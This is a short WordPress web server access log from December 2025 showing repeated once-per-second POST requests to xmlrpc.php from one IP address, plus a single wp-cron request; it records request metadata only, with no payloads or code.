45.154.98.144 - - [01/Dec/2025:03:38:40 +0800] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.154.98.144 - - [01/Dec/2025:03:38:41 +0800] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.154.98.144 - - [01/Dec/2025:03:38:42 +0800] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.154.98.144 - - [01/Dec/2025:03:38:43 +0800] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.154.98.144 - - [01/Dec/2025:03:38:44 +0800] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.154.98.144 - - [01/Dec/2025:03:38:45 +0800] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
36.133.115.36 - - [01/Dec/2025:03:38:46 +0800] "POST /wp-cron.php?doing_wp_cron=1764531526.2134430408477783203125 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
45.154.98.144 - - [01/Dec/2025:03:38:46 +0800] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.154.98.144 - - [01/Dec/2025:03:38:47 +0800] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.154.98.144 - - [01/Dec/2025:03:38:48 +0800] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.154.98.144 - - [01/Dec/2025:03:38:48 +0800] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.154.98.144 - - [01/Dec/2025:03:38:49 +0800] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.154.98.144 - - [01/Dec/2025:03:38:50 +0800] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.154.98.144 - - [01/Dec/2025:03:38:51 +0800] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.154.98.144 - - [01/Dec/2025:03:38:52 +0800] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.154.98.144 - - [01/Dec/2025:03:38:53 +0800] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.154.98.144 - - [01/Dec/2025:03:38:54 +0800] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.154.98.144 - - [01/Dec/2025:03:38:55 +0800] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
